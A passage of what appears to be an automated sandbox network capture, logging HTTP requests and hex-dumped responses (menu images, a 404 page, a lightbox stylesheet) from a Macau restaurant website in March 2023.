59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*^(12i ''Adobe Photoshop CS6 (Windows)2020:05:28 12:02:390221^nv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:15.655064106 CET2340OUTGET /images/menu04b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:15.861011028 CET2378INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1961
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "266247f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:21 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 5a 03 01 11 00 02 11 01 03 11 01 ff c4 00 85 00 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 06 03 05 07 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 08 10 00 01 03 04 01 04 02 03 00 03 00 00 00 00 00 00 03 01 02 04 11 12 05 06 00 21 22 13 07 31 41 32 14 15 51 61 16 11 00 02 01 03 03 03 03 03 03 05 01 00 00 00 00 00 01 02 11 00 12 03 21 31 04 41 13 05 51 61 22 71 81 32 91 a1 42 f0 d1 52 62 23 15 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef b7 f3 e5 9a e0 52 fe 29 4b f8 a5 2f e2 94 bf 8a 52 fe 29 4b f8 a5 49 34 49 b1 e3 c4 97 22 21 c1 17 20 d7 ba 04 92 0d cd 19 da 37 2b 1e a3 7a a2 23 d1 ae 45 6a d3 e1 7a 73 23 61 74 55 66 52 03 4c 18 d0 c1 83 07 ac 1d 0c 75 a9 83 51 af e6 3a 8a 5f c5 29 7f 14 a5 fc 52 ba b4 0c 84 cd 63 d5 71 73 7a ec a7 e3 73 19 bd 80 f0 b2 b9 a8 aa a3 94 30 47 8e 32 0a 3b 0c da 38 6d 72 b9 5e b6 aa 5d f0 bd 12 9c f5 58 72 bf 0f c5 0c b8 09 57 7c a5 59 86 8c 02 a8 21 43 6e 01 99 31 bd 6c 02 57 1c 8d c9 ab 44 ac 2c 7d df 0d a9 66 f6 07 90 79 d9 5a ce c3 3e 7c d0 58 33 4b 5c 4a b9 61 94 f7 35 d7 dd 45 6b 9d 4a b9 13 e7 ef 9d 0c 9c 35 f2 58 70 e6 cf 3d c3 8b 33 12 20 16 ed 7e 05 b4 d6 76 27 73 1b d5 ca de 01 3b c1 fd aa b3 ad e8 38 3c b8 fd 70 59 d3 27 05 9b 72 67 57 2c e0 38 6a a3 4c 5b 1c e1 28 5a e6 7d d3 b9 1c ab 5f ab 79 cf e0 78 4c 19 c7 14 bb 30 ee f7 6e 88 d3 b6 34 b7 4f d6 67 ed 54 4c 40 db 3d 67 f6 aa 2c 32 e2 89 b5 62 17 0b 1a 5c 5c 7f ef c5 41 0a 69 d9 20 ca a8 56 d5 ce 78 c4 16 a5 7e 69 6f 4f 8a af cf 39 18 bb 47 96 9d a0 c1 6e 5f c8 86 3b 8e a0 28 fb 46 9e a6 b1 88 b8 45 76 dd ef 3b 0a 4c cd df 55 cd 6d 0e da 66 65 b6 c4 1e 0b 1e d6 c9 7a e1 04 39 84 43 23 4d 2c 4c 6b 15 58 a8 2b 03 73 3a 56 b4 e7 ad f3 3c b4 77 e4 71 b2 e6 ee b3 e6 f8 0f 91 ec 80 e6 ef 93 80 06 9f 1b 52 57 de b6 32 30 24 a9 33 af e9 55 6c 9e 9b a5 42 ca ef 6c 0f f6 df 89 f5 e5 e3 c8 5d 22 3a c9 9c 72 4a 64 50 b0 54 8d 68 18 d7 2a de f7 21 2a 94 54 6b 6b 6f 39 dc 8f 11 c2 c7 97 90 07 72 ce 3e fa ad ce 4b 04 50 3e 30 80 19 96 37 4f 40 36 aa 1c 6a 09 de 05 7a 2f 5f 6b 52 23 43 d9 47 27 24 3d 60 ba cc ac fc 8c 53 88 17 64 10 91 25 24 37 47 69 fc 2d 1d ae 23 91 50 8a 2f c6 bd bc 2f 83 e3 32 af 20 17 ed 1c 4d 90 ac 8b e5 5a cb 6e 88 82 48 21 ad db f8 d3 b4 bb eb 11 35 65 36 03 5e da b1 1e af c7 45 5c 8c 3c 32 6b fb 24 d8 ec 29 44 e9 2d 2c 53 c8 35 8f 23 44 8c 73 7c ad 54 aa 31 aa ad fa 6a fc 6f bf 07 8f cd c3 c4 c6 b7 04 ed 66 61 24 5d 2a 59 a0 98 82 2e 1e 82 47 a1 ab 94 0c 14 74 83 54 ed 6b d7 d8 9c d6 1f 55 ca c9 9b 2e 3b 72 2e ce 1f
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedZ!"1A2Qa!1AQa"q2BRb#?R)K/R)KI4I"! 7+z#Ejzs#atUfRLuQ:_)Rcqszs0G2;8mr^]XrW|Y!Cn1lWD,}fyZ>|X3K\Ja5EkJ5Xp=3 ~v's;8<pY'rgW,8jL[(Z}_yxL0n4OgTL@=g,2b\\Ai Vx~ioO9Gn_;(FEv;LUmfez9C#M,LkX+s:V<wqRW20$3UlBl]":rJdPTh*!*Tkko9r>KP>07O@6jz/_kR#CG'$=`Sd%$7Gi-#P//2 MZnH!5e6^E\<2k$)D-,S5#Ds|T1jofa$]*Y.GtTkU.;r.
                                                                                                                                                              Mar 13, 2023 05:26:16.274100065 CET2412OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:16.478090048 CET2431INHTTP/1.1 404 Not Found
                                                                                                                                                              Content-Length: 1635
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:22 GMT
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                              Mar 13, 2023 05:26:21.630111933 CET2502OUTGET /images/menu03b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:21.849642992 CET2519INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2264
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a1439f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 8c 00 00 03 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 04 06 03 05 07 02 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 05 04 06 08 10 00 01 03 03 03 03 04 01 02 07 00 00 00 00 00 00 03 01 02 04 11 05 06 00 12 13 21 22 14 31 41 15 07 16 42 62 61 32 23 33 24 34 17 11 00 02 01 03 02 03 06 05 05 01 00 00 00 00 00 00 01 02 11 00 12 03 21 04 31 41 05 51 61 71 22 32 13 81 42 52 14 15 f0 a1 b1 c1 06 33 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef bb f5 f9 66 b8 14 6f d2 94 6f d2 94 6f d2 94 6f d2 94 cc a8 b3 20 bc 63 9b 10 d0 c8 61 0c e2 19 c6 e1 b9 c2 2b 51 c3 23 51 c8 95 6b 9a b5 45 f4 54 f4 d6 99 30 be 22 03 a9 04 80 75 11 a1 d4 1f 03 c8 d4 91 1c 69 6d fa ce a2 8d fa 52 8d fa 52 99 95 16 64 17 8c 73 62 1a 19 0c 21 9c 43 38 dc 37 38 45 6a 38 64 6a 39 12 ad 73 56 a8 be 8a 9e 9a d3 26 17 c4 40 75 20 90 0e a2 34 3a 83 e0 79 1a 92 23 8d 2d bf 59 d4 51 bf 4a 51 bf 4a 57 50 c3 64 12 cb 81 67 59 45 a9 e8 1c 8a 1c 9b 6c 08 d7 16 b7 fa d0 a3 ca 71 54 a4 0b a9 d8 e2 2b 11 9b d3 aa 7b 2a 2a eb e9 fa 53 1d be c3 71 b8 c5 a6 50 51 43 73 45 69 92 a7 91 31 13 c4 72 af 46 3d 10 91 c7 4a b0 b1 40 5f b2 b1 fc 2b f2 e9 52 24 dc 25 65 af b2 0e f9 b9 be 71 a0 ba 27 33 da e3 11 af 52 71 11 12 8a e4 75 37 53 5d 4d 9e 0f cb ed f0 7d d1 25 8e 6f 6e ff 00 9c a5 b7 1f 31 9b ad 3c 09 98 98 ab a8 f7 14 5d db 15 0d 8f 61 96 ab b5 9e d1 70 91 22 53 0d 70 cd 62 63 66 68 dc c4 6a 45 90 3d ee 7b 51 46 ab c8 8b e8 aa b4 fd ba e3 ec ba 46 2c f8 51 d8 b4 b6 e1 71 18 8f 4b 09 9e 1e af db ba b3 5c 60 80 7b e2 a5 b2 b8 d8 fc 0b e4 bb 5d 89 93 c7 16 db 20 b1 24 4b 9e 51 95 e6 70 88 ac 52 34 62 10 d0 69 d3 f9 55 cf 5f dd ed ae 7f 52 c5 b7 c5 9d b1 e1 ba 14 90 4b 10 66 0c 4c 00 23 c2 5b c6 a8 e0 03 02 ba 37 d9 b9 25 f3 17 ca ae f8 85 8e 69 2d 98 b5 b2 38 a0 c3 b1 b1 1a b1 0c 02 47 62 a9 4a 17 22 8c ae 2a b9 5f bd c8 ab 55 aa 2f 44 d7 77 fd 06 fb 3e cf 76 fb 5c 2c 57 0a 80 a1 3e 52 a5 46 a5 78 31 6e 37 10 4f 61 ad 73 31 56 2a 38 56 fb 26 b1 63 b9 1c c8 b0 48 eb 88 32 08 5f 5f c2 ba c7 98 d2 0b c3 ac 2b 68 cc 81 70 78 dc 47 6f 63 57 bd 08 da 2d 3b 17 d5 7d 9d 43 65 b6 dd b8 43 78 c8 36 ca e0 c8 b3 c9 8c 1b 6d 89 32 07 aa e1 07 e5 35 77 55 63 1c ed fe aa 7e d9 80 e3 07 bb 62 f8 84 d3 dd 17 23 ca ad 41 b8 06 f0 12 89 b0 63 12 60 16 44 71 ba 32 81 c4 23 51 b4 47 bd 0a df 7a 27 4d 78 b6 fd 13 6a d9 70 ed 5c bf bb 95 03 5c 08 b1 4b 0b 94 5b 69 2c 3e a3 70 f0 d2 a8 31 2c 85 d6 48 a9 eb be 3f 8a 63 d6 db 34 5b 93 ee b2 72 0b ed 94 77 68 d3 a2 90 0d 84 17 c9 dc b1
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedd!"1ABba2#3$4!1AQaq"2BR3?foooo ca+Q#QkET0"uimRRdsb!C878Ej8dj9sV&@u 4:y#-YQJQJWPdgYElqT+{**SqPQCsEi1rF=J@_+R$%eq'3Rqu7S]M}%on1<]ap"SpbcfhjE={QFF,QqK\`{] $KQpR4biU_RKfL#[7%i-8GbJ"*_U/Dw>v\,W>RFx1n7Oas1V*8V&cH2__+hpxGocW-;}CeCx6m25wUc~b#Ac`Dq2#QGz'Mxjp\\K[i,>p1,H?c4[rwh
                                                                                                                                                              Mar 13, 2023 05:26:40.473608017 CET2789OUTGET /css/lightbox.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:40.805717945 CET2816INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2030
                                                                                                                                                              Content-Type: text/css
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:14:29 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "f688f9d6a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:46 GMT
                                                                                                                                                              Data Raw: 23 6c 69 67 68 74 62 6f 78 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 6c 65 66 74 3a 20 30 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 30 30 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0d 0a 09 7d 0d 0a 0d 0a 23 6c 69 67 68 74 62 6f 78 20 61 20 69 6d 67 7b 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 0d 0a 23 6f 75 74 65 72 49 6d 61 67 65 43 6f 6e 74 61 69 6e 65 72 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 09 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 09 68 65 69 67 68 74 3a 20 32 35 30 70 78 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 7d 0d 0a 0d 0a 23 69 6d 61 67 65 43 6f 6e 74 61 69 6e 65 72 7b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0d 0a 09 7d 0d 0a 0d 0a 23 6c 6f 61 64 69 6e 67 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 74 6f 70 3a 20 34 30 25 3b 0d 0a 09 6c 65 66 74 3a 20 30 25 3b 0d 0a 09 68 65 69 67 68 74 3a 20 32 35 25 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 3b 0d 0a 09 7d 0d 0a 23 68 6f 76 65 72 4e 61 76 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 74 6f 70 3a 20 30 3b 0d 0a 09 6c 65 66 74 3a 20 30 3b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 30 3b 0d 0a 09 7d 0d 0a 23 69 6d 61 67 65 43 6f 6e 74 61 69 6e 65 72 3e 23 68 6f 76 65 72 4e 61 76 7b 20 6c 65 66 74 3a 20 30 3b 7d 0d 0a 23 68 6f 76 65 72 4e 61 76 20 61 7b 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 7d 0d 0a 0d 0a 23 70 72 65 76 4c 69 6e 6b 2c 20 23 6e 65 78 74 4c 69 6e 6b 7b 0d 0a 09 77 69 64 74 68 3a 20 34 39 25 3b 0d 0a 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 62 6c 61 6e 6b 2e 67 69 66 29 20 6e 6f 2d 72 65 70 65 61 74 3b 20 2f 2a 20 54 72 69 63 6b 20 49 45 20 69 6e 74 6f 20 73 68 6f 77 69 6e 67 20 68 6f 76 65 72 20 2a 2f 0d 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 09 7d 0d 0a 23 70 72 65 76 4c 69 6e 6b 20 7b 20 6c 65 66 74 3a 20 30 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 7d 0d 0a 23 6e 65 78 74 4c 69 6e 6b 20 7b 20 72 69 67 68 74 3a 20 30 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 7d 0d 0a 23 70 72 65 76 4c 69 6e 6b 3a 68 6f 76 65 72 2c 20 23 70 72 65 76 4c 69 6e 6b 3a 76 69 73 69 74 65 64 3a 68 6f 76 65 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 70 72 65 76 6c 61 62 65 6c 2e 67 69 66 29 20 6c 65 66 74 20 31 35 25 20 6e 6f 2d 72 65 70 65 61 74 3b 20 7d 0d 0a 23 6e 65 78 74 4c 69 6e 6b 3a 68 6f 76 65 72 2c 20 23 6e 65 78 74 4c 69 6e 6b 3a 76 69 73 69 74 65 64 3a 68 6f 76 65 72 20 7b 20 62 61 63 6b 67 72 6f
                                                                                                                                                              Data Ascii: #lightbox{position: absolute;left: 0;width: 100%;z-index: 100;text-align: center;line-height: 0;}#lightbox a img{ border: none; }#outerImageContainer{position: relative;background-color: #fff;width: 250px;height: 250px;margin: 0 auto;}#imageContainer{padding: 10px;}#loading{position: absolute;top: 40%;left: 0%;height: 25%;width: 100%;text-align: center;line-height: 0;}#hoverNav{position: absolute;top: 0;left: 0;height: 100%;width: 100%;z-index: 10;}#imageContainer>#hoverNav{ left: 0;}#hoverNav a{ outline: none;}#prevLink, #nextLink{width: 49%;height: 100%;background: transparent url(../images/blank.gif) no-repeat; /* Trick IE into showing hover */display: block;}#prevLink { left: 0; float: left;}#nextLink { right: 0; float: right;}#prevLink:hover, #prevLink:visited:hover { background: url(../images/prevlabel.gif) left 15% no-repeat; }#nextLink:hover, #nextLink:visited:hover { backgro
                                                                                                                                                              Mar 13, 2023 05:26:41.504580021 CET2870OUTGET /images/menu01.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
